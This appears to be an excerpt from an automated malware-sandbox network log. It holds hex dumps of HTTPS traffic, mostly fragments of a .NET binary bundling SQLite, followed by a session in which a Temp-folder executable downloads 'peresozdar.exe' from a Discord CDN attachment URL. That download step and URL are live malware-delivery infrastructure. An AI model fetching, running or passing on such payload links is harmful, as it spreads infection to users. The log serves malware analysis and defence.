2023-11-18 09:02:34 UTC	196	IN	Data Raw: ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 03 00 b1 61 00 00 04 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 03 00 b1 61 00 00 04 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 03 00 b1 61 00 00 04 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 95 2c 00 00 02 00 0e 39 00 00 03 00 98 72 00 00 04 00 f0 3d 00 00 05 00 85 93 00 00 06 00 6b 93 00 00 07 00 7a 93 00 00 08 00 20 c2 00 00 01 00 95 2c 00 00 02 00 0e 39 00 00 03 00 98 72 00 00 04 00 f0 3d 00 00 05 00 85 93 00 00 Data Ascii: >x)pTpTa>>x)pTpTa>>x)pTpTa>>x),9r=kz ,9r=
2023-11-18 09:02:34 UTC	199	IN	Data Raw: 00 00 01 00 ab 3e 00 00 02 00 be 43 00 00 03 00 89 53 00 00 04 00 d2 6e 00 00 05 00 6a 71 00 00 01 00 95 2c 00 00 01 00 ab 3e 00 00 02 00 be 43 00 00 03 00 89 53 00 00 04 00 85 75 00 00 05 00 cb 32 00 00 06 00 62 6f 00 00 07 00 20 31 00 00 08 00 d2 6e 00 00 09 00 6a 71 00 00 0a 00 df 51 00 00 01 00 ab 3e 00 00 02 00 be 43 00 00 03 00 89 53 00 00 04 00 85 75 00 00 05 00 62 6f 00 00 06 00 20 31 00 00 07 00 d2 6e 00 00 08 00 6a 71 00 00 09 00 92 57 00 00 0a 00 df 51 00 00 01 00 be 43 00 00 02 00 89 53 00 00 01 00 be 43 00 00 02 00 89 53 00 00 03 00 d2 6e 00 00 01 00 be 43 00 00 02 00 89 53 00 00 03 00 d2 6e 00 00 04 00 6a 71 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 Data Ascii: >CSnjq,>CSu2bo 1njqQ>CSubo 1njqWQCSCSnCSnjqQQQQQQQ
2023-11-18 09:02:34 UTC	203	IN	Data Raw: 1c 00 00 02 00 1b bb 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 02 00 ca 8d 00 00 01 00 ca 8d 00 00 01 00 ca 8d 00 00 02 00 e6 6b 00 00 03 00 11 91 00 00 04 00 5c 1f 00 00 05 00 2f b9 00 00 01 00 ca 8d 00 00 01 00 ca 8d 00 00 01 00 ca 8d 00 00 02 00 0c b9 00 00 03 00 a7 bb 00 00 01 00 ca 8d 00 00 02 00 ac 21 00 00 01 00 c7 1c 00 00 02 00 5c 1f 00 00 03 00 2f b9 00 00 04 00 ac 21 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 02 00 bd 5b 00 00 03 00 b8 3f 00 00 04 00 b1 61 00 00 05 00 16 1b 00 00 01 00 c7 1c 00 00 02 00 34 b9 00 00 01 00 c7 1c 00 00 02 00 21 b1 00 00 01 00 c7 1c 00 00 02 00 21 b1 00 00 01 00 c7 1c 00 00 02 00 21 b1 00 00 01 00 0c b9 00 00 01 00 df 51 00 00 01 00 df 51 00 00 Data Ascii: k\/!\/![?a4!!!QQ
2023-11-18 09:02:34 UTC	207	IN	Data Raw: 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 27 b9 00 00 02 00 fe 44 00 00 03 00 d5 8f 00 00 01 00 27 b9 00 00 02 00 fe 44 00 00 03 00 d5 8f 00 00 04 00 b1 61 00 00 05 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 27 b9 00 00 02 00 97 1a 00 00 03 00 91 1a 00 00 01 00 27 b9 00 00 02 00 97 1a 00 00 03 00 91 1a 00 00 04 00 b1 61 00 00 05 00 3e a9 00 00 01 00 91 1a 00 00 02 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 27 b9 00 00 02 00 97 1a 00 00 03 00 91 1a 00 00 01 00 27 b9 00 00 02 00 97 1a 00 00 03 00 91 1a 00 00 04 00 b1 61 00 00 05 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 66 1c 00 00 02 00 3e bc 00 00 03 00 5c 1f 00 00 04 00 2f b9 00 00 05 00 c7 1c 00 Data Ascii: >>x)'D'Da>>x)''a>>x)''a>>x)f>\/
2023-11-18 09:02:34 UTC	212	IN	Data Raw: 8f 06 00 81 03 59 58 10 00 81 03 e2 a6 e8 09 81 03 37 6a 11 07 89 03 3b c2 fc 09 89 03 47 c2 fc 09 e9 06 39 6e 16 0a c1 05 da 8a 1c 0a 69 01 d6 91 99 03 0c 01 8c 51 72 01 b1 01 f9 47 28 0a 09 06 f6 47 31 0a 21 01 66 a7 3e 0a e9 05 e9 9c a4 0a 1c 01 e8 8f 84 02 1c 01 4d 51 43 01 1c 01 11 50 d6 00 29 06 72 04 b6 0a 99 06 e8 8f 10 00 09 05 41 54 be 0a f1 06 e8 8f 10 00 0c 01 b3 bd 7b 01 0c 01 40 6a 64 01 f9 06 d4 6f cc 0a 89 03 14 b0 d1 0a 19 02 8e 73 d7 0a 24 01 e8 8f 06 00 2c 01 40 6a 64 01 41 03 47 c2 ed 0a 41 03 28 3f f7 0a c1 04 33 70 fd 0a 41 03 3b c2 ed 0a 41 03 c5 23 03 0b 41 03 82 96 0b 0b e1 05 c1 64 68 03 e1 05 48 04 28 0b e1 05 3e 04 2f 0b e1 05 ce 64 35 0b 59 05 6c 6e 3a 0b 59 05 0e 1b 11 07 59 05 0c c1 ed 00 f9 06 2d 82 40 0b f9 06 2a 82 40 0b Data Ascii: YX7j;G9niQrG(G1!f>MQCP)rAT{@jdos$,@jdAGA(?3pA;A#AdhH(>/d5Yln:YY-@*@
2023-11-18 09:02:34 UTC	216	IN	Data Raw: 50 02 2b 24 08 00 58 02 5d 21 08 00 5c 02 62 21 08 00 60 02 67 21 08 00 64 02 ae 23 08 00 68 02 6c 21 08 00 6c 02 b3 23 08 00 70 02 7b 21 08 00 74 02 b8 23 08 00 78 02 bd 23 08 00 7c 02 c2 23 08 00 80 02 c7 23 08 00 84 02 cc 23 08 00 88 02 30 24 08 00 8c 02 35 24 08 00 90 02 3a 24 08 00 94 02 53 21 08 00 98 02 3f 24 08 00 9c 02 44 24 08 00 a0 02 49 24 08 00 a4 02 4e 24 08 00 a8 02 53 24 08 00 ac 02 58 24 08 00 b0 02 5d 24 08 00 b4 02 62 24 08 00 b8 02 67 24 08 00 bc 02 6c 24 08 00 c0 02 71 24 08 00 c4 02 76 24 08 00 c8 02 7b 24 08 00 d0 02 5d 21 08 00 d4 02 62 21 08 00 d8 02 67 21 08 00 dc 02 6c 21 08 00 e0 02 bd 23 08 00 e8 02 80 24 08 00 ec 02 5d 21 08 00 f0 02 62 21 08 00 f4 02 67 21 08 00 f8 02 ae 23 08 00 fc 02 6c 21 08 00 00 03 b3 23 08 00 04 03 7b Data Ascii: P+$X]!\b!`g!d#hl!l#p{!t#x#\|###0$5$:$S!?$D$I$N$S$X$]$b$g$l$q$v${$]!b!g!l!#$]!b!g!#l!#{
2023-11-18 09:02:34 UTC	220	IN	Data Raw: 00 db 00 c8 54 a3 16 00 00 9b 00 f9 4f c3 16 00 00 9b 00 f9 4f e3 16 00 00 9b 00 f9 4f 03 17 00 00 9b 00 f9 4f 23 17 00 00 9b 00 f9 4f 43 17 00 00 9b 00 f9 4f 63 17 00 00 9b 00 f9 4f 83 17 00 00 9b 00 f9 4f a3 17 00 00 9b 00 f9 4f c3 17 00 00 9b 00 f9 4f e3 17 00 00 9b 00 f9 4f 03 18 00 00 9b 00 f9 4f 23 18 00 00 9b 00 f9 4f 43 18 00 00 9b 00 f9 4f 63 18 00 00 9b 00 f9 4f 69 18 00 00 1b 01 f9 4f 83 18 00 00 9b 00 f9 4f 89 18 00 00 1b 01 f9 4f a3 18 00 00 9b 00 f9 4f c3 18 00 00 9b 00 f9 4f e3 18 00 00 9b 00 f9 4f 03 19 00 00 9b 00 f9 4f 23 19 00 00 9b 00 f9 4f 43 19 00 00 9b 00 f9 4f 63 19 00 00 9b 00 f9 4f 83 19 00 00 9b 00 f9 4f a3 19 00 00 9b 00 f9 4f c3 19 00 00 9b 00 f9 4f e3 19 00 00 9b 00 f9 4f e3 1a 00 00 9b 00 3b 58 e3 1a 00 00 a3 01 62 21 23 1b Data Ascii: TOOOO#OCOcOOOOOO#OCOcOiOOOOOOO#OCOcOOOOO;Xb!#
2023-11-18 09:02:34 UTC	226	IN	Data Raw: 89 11 a7 11 c1 11 d7 11 de 11 f2 11 fb 11 14 12 22 12 4c 12 67 12 6d 13 8e 13 98 13 14 14 48 14 84 14 93 14 a2 14 ac 14 cb 15 d7 15 e0 15 e9 15 f6 15 fc 16 05 17 18 19 b4 19 bb 19 c2 1a 75 1b 7e 1b 87 1b 56 1c a7 1c ce 1c da 1c 5d 1d 71 1d 87 1d 8d 1d 9e 1d 00 02 95 0a 12 40 01 00 62 12 97 0a 32 6e 01 00 40 02 99 0a e3 47 01 00 66 11 9f 0a f5 bf 02 00 00 01 a1 0a 8a 7a 02 00 00 01 d7 0a b7 19 03 00 00 01 d9 0a 73 05 03 00 00 01 db 0a 9d 0a 03 00 00 01 dd 0a 89 2a 03 00 00 01 df 0a ab 54 03 00 00 01 e1 0a a9 04 03 00 00 01 e3 0a ca 1e 03 00 00 01 e5 0a 80 09 03 00 00 01 e7 0a d5 20 03 00 00 01 e9 0a d0 1b 03 00 00 01 eb 0a 55 01 03 00 00 01 ed 0a 05 0a 03 00 00 01 ef 0a 96 04 03 00 00 01 f1 0a ab 03 03 00 00 01 f3 0a 3e 1d 03 00 00 01 f5 0a 84 1b 03 00 00 Data Ascii: "LgmHu~V]q@b2n@Gfzs*T U>
2023-11-18 09:02:34 UTC	231	IN	Data Raw: 34 39 00 53 49 33 36 65 36 37 31 36 30 30 35 32 66 37 66 36 39 00 53 49 64 62 62 65 31 62 35 32 66 33 30 34 66 33 37 39 00 53 49 31 35 30 39 35 33 64 63 36 32 66 30 61 38 37 39 00 53 49 36 37 34 63 33 62 63 30 37 66 63 31 37 39 37 39 00 53 49 63 30 62 62 34 65 61 62 37 37 66 35 61 39 39 39 00 34 38 44 45 37 35 34 43 43 30 43 37 37 36 44 41 44 31 41 38 35 44 42 38 31 42 45 46 41 41 41 44 45 33 41 34 34 37 45 39 00 53 49 30 37 35 32 35 38 66 65 37 33 33 32 66 35 63 39 00 53 49 65 36 34 30 35 64 66 64 37 62 36 33 65 61 64 39 00 53 49 32 34 30 39 63 37 65 31 65 62 35 30 30 63 65 39 00 53 49 36 65 36 63 35 34 34 63 30 32 38 62 32 64 65 39 00 53 49 65 35 37 61 61 37 37 63 38 38 38 34 64 33 66 39 00 3c 4d 6f 64 75 6c 65 3e 00 3c 50 72 69 76 61 74 65 49 6d 70 6c Data Ascii: 49SI36e67160052f7f69SIdbbe1b52f304f379SI150953dc62f0a879SI674c3bc07fc17979SIc0bb4eab77f5a99948DE754CC0C776DAD1A85DB81BEFAAADE3A447E9SI075258fe7332f5c9SIe6405dfd7b63ead9SI2409c7e1eb500ce9SI6e6c544c028b2de9SIe57aa77c8884d3f9<Module><PrivateImpl
2023-11-18 09:02:34 UTC	245	IN	Data Raw: 65 63 74 69 6f 6e 42 61 73 65 00 53 51 4c 69 74 65 43 68 61 6e 67 65 53 65 74 42 61 73 65 00 67 65 74 5f 4f 72 64 69 6e 61 6c 49 67 6e 6f 72 65 43 61 73 65 00 69 67 6e 6f 72 65 43 61 73 65 00 4e 6f 43 61 73 65 00 51 75 6f 74 65 64 49 64 65 6e 74 69 66 69 65 72 43 61 73 65 00 5f 62 61 73 65 00 67 65 74 5f 44 61 74 61 62 61 73 65 00 43 68 61 6e 67 65 44 61 74 61 62 61 73 65 00 42 61 63 6b 75 70 44 61 74 61 62 61 73 65 00 44 65 63 72 79 70 74 4c 65 67 61 63 79 44 61 74 61 62 61 73 65 00 64 61 74 61 62 61 73 65 00 73 71 6c 62 61 73 65 00 78 52 65 6c 65 61 73 65 00 72 65 6c 65 61 73 65 00 4d 69 73 75 73 65 5f 4e 6f 5f 4c 69 63 65 6e 73 65 00 49 6f 45 72 72 5f 44 69 72 5f 43 6c 6f 73 65 00 49 6f 45 72 72 5f 43 6c 6f 73 65 00 55 6e 62 69 6e 64 46 75 6e 63 74 69 Data Ascii: ectionBaseSQLiteChangeSetBaseget_OrdinalIgnoreCaseignoreCaseNoCaseQuotedIdentifierCase_baseget_DatabaseChangeDatabaseBackupDatabaseDecryptLegacyDatabasedatabasesqlbasexReleasereleaseMisuse_No_LicenseIoErr_Dir_CloseIoErr_CloseUnbindFuncti
2023-11-18 09:02:34 UTC	261	IN	Data Raw: 62 61 63 6b 48 61 6e 64 6c 65 72 00 72 65 6d 6f 76 65 5f 5f 72 6f 6c 6c 62 61 63 6b 48 61 6e 64 6c 65 72 00 61 64 64 5f 5f 61 75 74 68 6f 72 69 7a 65 72 48 61 6e 64 6c 65 72 00 72 65 6d 6f 76 65 5f 5f 61 75 74 68 6f 72 69 7a 65 72 48 61 6e 64 6c 65 72 00 61 64 64 5f 5f 70 72 6f 67 72 65 73 73 48 61 6e 64 6c 65 72 00 72 65 6d 6f 76 65 5f 5f 70 72 6f 67 72 65 73 73 48 61 6e 64 6c 65 72 00 53 51 4c 69 74 65 43 6f 6d 6d 69 74 48 61 6e 64 6c 65 72 00 61 64 64 5f 5f 63 6f 6d 6d 69 74 48 61 6e 64 6c 65 72 00 72 65 6d 6f 76 65 5f 5f 63 6f 6d 6d 69 74 48 61 6e 64 6c 65 72 00 41 64 64 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 00 52 65 6d 6f 76 65 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 00 49 6e 69 74 69 61 6c 69 7a 65 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 00 Data Ascii: backHandlerremove__rollbackHandleradd__authorizerHandlerremove__authorizerHandleradd__progressHandlerremove__progressHandlerSQLiteCommitHandleradd__commitHandlerremove__commitHandlerAddDefaultHandlerRemoveDefaultHandlerInitializeDefaultHandler
2023-11-18 09:02:34 UTC	262	IN	Data Raw: 72 00 41 70 70 6c 79 54 61 62 6c 65 46 69 6c 74 65 72 00 78 53 65 73 73 69 6f 6e 46 69 6c 74 65 72 00 78 46 69 6c 74 65 72 00 73 71 6c 69 74 65 33 73 65 73 73 69 6f 6e 5f 74 61 62 6c 65 5f 66 69 6c 74 65 72 00 54 72 79 45 6e 74 65 72 00 70 6f 69 6e 74 65 72 00 67 65 74 5f 44 61 74 61 41 64 61 70 74 65 72 00 73 65 74 5f 44 61 74 61 41 64 61 70 74 65 72 00 44 62 44 61 74 61 41 64 61 70 74 65 72 00 43 72 65 61 74 65 44 61 74 61 41 64 61 70 74 65 72 00 53 51 4c 69 74 65 44 61 74 61 41 64 61 70 74 65 72 00 53 51 4c 69 74 65 53 74 72 65 61 6d 41 64 61 70 74 65 72 00 47 65 74 53 74 72 65 61 6d 41 64 61 70 74 65 72 00 69 6e 70 75 74 53 74 72 65 61 6d 41 64 61 70 74 65 72 00 6f 75 74 70 75 74 53 74 72 65 61 6d 41 64 61 70 74 65 72 00 73 74 72 65 61 6d 41 64 61 70 Data Ascii: rApplyTableFilterxSessionFilterxFiltersqlite3session_table_filterTryEnterpointerget_DataAdapterset_DataAdapterDbDataAdapterCreateDataAdapterSQLiteDataAdapterSQLiteStreamAdapterGetStreamAdapterinputStreamAdapteroutputStreamAdapterstreamAdap
2023-11-18 09:02:34 UTC	278	IN	Data Raw: 00 66 00 20 00 74 00 79 00 70 00 65 00 20 00 7b 00 30 00 7d 00 00 3b 63 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 65 00 20 00 64 00 61 00 74 00 61 00 62 00 61 00 73 00 65 00 20 00 6e 00 61 00 6d 00 65 00 00 80 83 63 00 6f 00 6e 00 66 00 69 00 67 00 75 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 20 00 7a 00 65 00 72 00 6f 00 20 00 28 00 30 00 29 00 20 00 74 00 79 00 70 00 65 00 20 00 6d 00 69 00 73 00 6d 00 61 00 74 00 63 00 68 00 2c 00 20 00 6d 00 75 00 73 00 74 00 20 00 62 00 65 00 20 00 6f 00 66 00 20 00 74 00 79 00 70 00 65 00 20 00 7b 00 30 00 7d 00 00 80 81 63 00 6f 00 6e 00 66 00 69 00 67 00 75 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 65 00 6c 00 65 00 6d 00 65 00 Data Ascii: f type {0};cannot allocate database nameconfiguration element zero (0) type mismatch, must be of type {0}configuration eleme
2023-11-18 09:02:34 UTC	279	IN	Data Raw: 62 00 00 19 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 42 00 6c 00 6f 00 62 00 00 29 69 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 69 00 6e 00 70 00 75 00 74 00 20 00 62 00 75 00 66 00 66 00 65 00 72 00 00 53 69 00 6e 00 70 00 75 00 74 00 20 00 62 00 75 00 66 00 66 00 65 00 72 00 20 00 69 00 73 00 20 00 73 00 69 00 7a 00 65 00 64 00 20 00 7b 00 30 00 7d 00 20 00 62 00 79 00 74 00 65 00 73 00 2c 00 20 00 6e 00 65 00 65 00 64 00 20 00 7b 00 31 00 7d 00 00 5f 72 00 65 00 61 00 64 00 20 00 7b 00 30 00 7d 00 20 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 20 00 70 00 61 00 67 00 65 00 20 00 62 00 79 00 74 00 65 00 73 00 2c 00 20 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 7b 00 31 00 7d 00 20 00 28 00 32 00 29 00 00 35 66 00 61 Data Ascii: bpasswordBlob)invalid input bufferSinput buffer is sized {0} bytes, need {1}_read {0} encrypted page bytes, expected {1} (2)5fa
2023-11-18 09:02:34 UTC	295	IN	Data Raw: 00 41 00 47 00 4d 00 41 00 20 00 5b 00 7b 00 30 00 7d 00 5d 00 2e 00 69 00 6e 00 64 00 65 00 78 00 5f 00 6c 00 69 00 73 00 74 00 28 00 5b 00 7b 00 31 00 7d 00 5d 00 29 00 00 80 93 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 4f 00 4d 00 20 00 5b 00 7b 00 30 00 7d 00 5d 00 2e 00 5b 00 7b 00 32 00 7d 00 5d 00 20 00 57 00 48 00 45 00 52 00 45 00 20 00 5b 00 74 00 79 00 70 00 65 00 5d 00 20 00 4c 00 49 00 4b 00 45 00 20 00 27 00 69 00 6e 00 64 00 65 00 78 00 27 00 20 00 41 00 4e 00 44 00 20 00 5b 00 6e 00 61 00 6d 00 65 00 5d 00 20 00 4c 00 49 00 4b 00 45 00 20 00 27 00 7b 00 31 00 7d 00 27 00 01 03 27 00 01 05 27 00 27 00 01 23 73 00 71 00 6c 00 69 00 74 00 65 00 5f 00 61 00 75 00 74 00 6f 00 69 00 6e 00 64 00 65 00 78 00 5f 00 00 3d 50 Data Ascii: AGMA [{0}].index_list([{1}])SELECT * FROM [{0}].[{2}] WHERE [type] LIKE 'index' AND [name] LIKE '{1}''''#sqlite_autoindex_=P
2023-11-18 09:02:34 UTC	311	IN	Data Raw: 4c 00 69 00 74 00 65 00 5f 00 42 00 61 00 73 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 00 45 50 00 72 00 65 00 4c 00 6f 00 61 00 64 00 53 00 51 00 4c 00 69 00 74 00 65 00 5f 00 55 00 73 00 65 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 00 47 50 00 72 00 65 00 4c 00 6f 00 61 00 64 00 53 00 51 00 4c 00 69 00 74 00 65 00 5f 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 6f 00 72 00 41 00 72 00 63 00 68 00 69 00 74 00 65 00 63 00 74 00 75 00 72 00 65 00 00 80 95 4e 00 61 00 74 00 69 00 76 00 65 00 20 00 6c 00 69 00 62 00 72 00 61 00 72 00 79 00 20 00 70 00 72 00 65 00 2d 00 6c 00 6f 00 61 00 64 00 65 00 72 00 20 00 69 00 73 00 20 00 74 00 72 00 79 00 69 00 6e 00 67 00 20 00 74 00 Data Ascii: Lite_BaseDirectoryEPreLoadSQLite_UseAssemblyDirectoryGPreLoadSQLite_ProcessorArchitectureNative library pre-loader is trying t
2023-11-18 09:02:34 UTC	327	IN	Data Raw: 00 04 00 10 00 00 04 00 00 10 00 04 30 f8 ff ff 04 64 00 00 00 04 1e 00 00 00 04 30 75 00 00 01 00 01 01 1e 7c 00 44 00 61 00 74 00 61 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 7c 00 02 5c 00 02 22 00 02 27 00 02 3d 00 02 3b 00 38 79 00 79 00 79 00 79 00 2d 00 4d 00 4d 00 2d 00 64 00 64 00 54 00 48 00 48 00 3a 00 6d 00 6d 00 3a 00 73 00 73 00 2e 00 66 00 66 00 66 00 66 00 66 00 66 00 66 00 4b 00 04 1f 00 00 00 04 20 00 00 00 04 21 00 00 00 04 af 07 00 00 04 65 00 00 00 04 ff 00 00 00 04 01 01 00 00 04 01 02 00 00 04 01 03 00 00 04 0a 01 00 00 04 0a 02 00 00 04 0a 03 00 00 04 0a 04 00 00 04 0a 05 00 00 04 0a 06 00 00 04 0a 07 00 00 04 0a 08 00 00 04 0a 09 00 00 04 0a 0a 00 00 04 0a 0b 00 00 04 0a 0c 00 00 04 0a 0d 00 00 04 0a 0e 00 00 04 0a Data Ascii: 0d0u\|DataDirectory\|\"'=;8yyyy-MM-ddTHH:mm:ss.fffffffK !e
2023-11-18 09:02:34 UTC	343	IN	Data Raw: 53 69 6d 70 73 6f 6e 20 28 72 6f 62 65 72 74 40 62 6c 61 63 6b 63 61 73 74 6c 65 73 6f 66 74 2e 63 6f 6d 29 0d 0a 20 2a 0d 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 74 6f 20 74 68 65 20 70 75 62 6c 69 63 20 64 6f 6d 61 69 6e 2c 20 75 73 65 20 61 74 20 79 6f 75 72 20 6f 77 6e 20 72 69 73 6b 21 0d 0a 20 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 2d 2d 3e 0d 0a 0d 0a 3c 44 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3e 0d 0a 20 20 3c 44 61 74 61 54 79 70 65 73 3e 0d 0a 20 20 20 20 3c 54 79 70 65 4e 61 6d 65 3e 73 6d 61 6c 6c 69 6e 74 3c 2f 54 79 70 65 4e 61 6d 65 3e 0d 0a 20 20 20 20 3c 50 72 6f 76 69 64 65 72 44 62 54 79 70 65 3e Data Ascii: Simpson (robert@blackcastlesoft.com) * * Released to the public domain, use at your own risk! ********************************************************/--><DocumentElement> <DataTypes> <TypeName>smallint</TypeName> <ProviderDbType>
2023-11-18 09:02:34 UTC	359	IN	Data Raw: 3e 31 3c 2f 50 72 6f 76 69 64 65 72 44 62 54 79 70 65 3e 0d 0a 20 20 20 20 3c 43 6f 6c 75 6d 6e 53 69 7a 65 3e 32 31 34 37 34 38 33 36 34 37 3c 2f 43 6f 6c 75 6d 6e 53 69 7a 65 3e 0d 0a 20 20 20 20 3c 44 61 74 61 54 79 70 65 3e 53 79 73 74 65 6d 2e 42 79 74 65 5b 5d 3c 2f 44 61 74 61 54 79 70 65 3e 0d 0a 20 20 20 20 3c 43 72 65 61 74 65 46 6f 72 6d 61 74 3e 62 6c 6f 62 3c 2f 43 72 65 61 74 65 46 6f 72 6d 61 74 3e 0d 0a 20 20 20 20 3c 49 73 41 75 74 6f 49 6e 63 72 65 6d 65 6e 74 61 62 6c 65 3e 66 61 6c 73 65 3c 2f 49 73 41 75 74 6f 49 6e 63 72 65 6d 65 6e 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 49 73 43 61 73 65 53 65 6e 73 69 74 69 76 65 3e 66 61 6c 73 65 3c 2f 49 73 43 61 73 65 53 65 6e 73 69 74 69 76 65 3e 0d 0a 20 20 20 20 3c 49 73 46 69 78 65 64 4c 65 Data Ascii: >1</ProviderDbType> <ColumnSize>2147483647</ColumnSize> <DataType>System.Byte[]</DataType> <CreateFormat>blob</CreateFormat> <IsAutoIncrementable>false</IsAutoIncrementable> <IsCaseSensitive>false</IsCaseSensitive> <IsFixedLe
2023-11-18 09:02:34 UTC	375	IN	Data Raw: 3c 43 6f 6c 6c 65 63 74 69 6f 6e 4e 61 6d 65 3e 4d 65 74 61 44 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 73 3c 2f 43 6f 6c 6c 65 63 74 69 6f 6e 4e 61 6d 65 3e 0a 20 20 20 20 3c 4e 75 6d 62 65 72 4f 66 52 65 73 74 72 69 63 74 69 6f 6e 73 3e 30 3c 2f 4e 75 6d 62 65 72 4f 66 52 65 73 74 72 69 63 74 69 6f 6e 73 3e 0a 20 20 20 20 3c 4e 75 6d 62 65 72 4f 66 49 64 65 6e 74 69 66 69 65 72 50 61 72 74 73 3e 30 3c 2f 4e 75 6d 62 65 72 4f 66 49 64 65 6e 74 69 66 69 65 72 50 61 72 74 73 3e 0a 20 20 3c 2f 4d 65 74 61 44 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 73 3e 0a 20 20 3c 4d 65 74 61 44 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 73 3e 0a 20 20 20 20 3c 43 6f 6c 6c 65 63 74 69 6f 6e 4e 61 6d 65 3e 44 61 74 61 53 6f 75 72 63 65 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 43 6f Data Ascii: <CollectionName>MetaDataCollections</CollectionName> <NumberOfRestrictions>0</NumberOfRestrictions> <NumberOfIdentifierParts>0</NumberOfIdentifierParts> </MetaDataCollections> <MetaDataCollections> <CollectionName>DataSourceInformation</Co
2023-11-18 09:02:34 UTC	391	IN	Data Raw: dd 28 eb 5f 26 a1 95 58 48 d5 1a fe d7 27 3f fd 90 d1 76 86 dd 1c b0 60 5c f3 0d a8 ee e0 89 a1 bd 39 e1 38 4e da 6e bb 36 9d fb e5 21 53 5a c3 ca e9 6a f1 a2 3e db 43 b8 33 c8 4f 38 14 92 99 f5 dd ce 54 6d d9 5d 02 14 1f 40 33 7c 03 e2 95 b2 c2 21 75 73 52 cb 46 d8 c4 34 1c a2 a5 4b 8d cd 6f 76 37 2c 85 3f 1a ce 26 e9 18 be 90 07 b0 43 7f 95 88 20 82 70 f0 cc ca ef fd 29 35 5c 1f 89 38 55 f7 37 8a 8b 09 a1 cb 0b e9 31 1a ff 2e 19 5c 39 71 e1 be 9c a7 0a 06 d6 26 67 b7 92 e6 4e 5f de 7a ac 49 cf 2e a4 74 92 ad db 3c a4 9c 86 1f e3 c1 56 1b 2b 23 ff 8f b5 ea 88 7b 70 6b e6 a0 ba fd 3a 3f 45 a6 c4 e8 16 91 52 8b 41 c0 48 84 4b 96 4d ab 44 40 e3 8d f0 15 28 ce ed f1 18 56 07 2a 2f 10 c4 0c 08 64 3c 33 8f ae 28 8c 3c cb 8f 88 0b 0d bf 3b f4 ce 1e 7b 8e ef b5 Data Ascii: (_&XH'?v`\98Nn6!SZj>C3O8Tm]@3\|!usRF4Kov7,?&C p)5\8U71.\9q&gN_zI.t<V+#{pk:?ERAHKMD@(V*/d<3(<;{

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	162.159.135.233	443	192.168.2.4	49789	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:59 UTC	10514	OUT	GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2023-11-18 09:03:00 UTC	10514	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:00 GMT Content-Type: application/x-msdos-program Content-Length: 145920 Connection: close CF-Ray: 827f09a91931c54d-SEA CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 405184 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="peresozdar.exe" ETag: "6c209163f8881e51e553f6c1b306d645" Expires: Sun, 17 Nov 2024 09:03:00 GMT Last-Modified: Wed, 25 Oct 2023 18:09:12 GMT Vary: Accept-Encoding Alt-Svc: h3=":443"; ma=86400 x-goog-generation: 1698257352039086 x-goog-hash: crc32c=ncQZlA== x-goog-hash: md5=bCCRY/iIHlHlU/bBswbWRQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 145920 X-GUploader-UploadID: 